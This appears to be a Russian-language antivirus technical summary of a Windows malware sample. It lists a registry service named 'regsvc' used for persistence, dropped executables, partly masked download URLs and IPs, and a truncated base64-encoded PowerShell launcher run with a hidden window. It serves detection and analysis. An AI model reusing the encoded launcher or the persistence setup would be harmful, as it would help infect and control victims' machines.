Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\regsvc] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\regsvc] 'ImagePath' = '"<SYSTEM32>\perfctrs\regsvc.exe"'
- 'regsvc' "<SYSTEM32>\perfctrs\regsvc.exe"
- 'regsvc' <SYSTEM32>\perfctrs\regsvc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGMAdABiAGUAbwBtAD0AJwBQAGYAaQBkADAAYwBnACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBgAFIASQB0AFkAcABgAFIATwB0AE8AYABjAGAAbwBsACIAIAA9AC...
- %TEMP%\qzso.exe
- <SYSTEM32>\perfctrs\regsvc.exe
- %TEMP%\qzso.exe в <SYSTEM32>\perfctrs\regsvc.exe
- '45.##3.88.33':80
- http://se###agro.com/wp-content/MZ9Qd/
- http://45.##3.88.33/caKHCxxrzBEhNQ3Cfu/LoUFT/TDQ7Fpp1QY3Ber/
- DNS ASK se###agro.com
- '%TEMP%\qzso.exe'
- '<SYSTEM32>\perfctrs\regsvc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGMAdABiAGUAbwBtAD0AJwBQAGYAaQBkADAAYwBnACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAGAAVQBgAFIASQB0AFkAcABgAFIATwB0AE8AYABjAGAAbwBsACIAIAA9AC...' (со скрытым окном)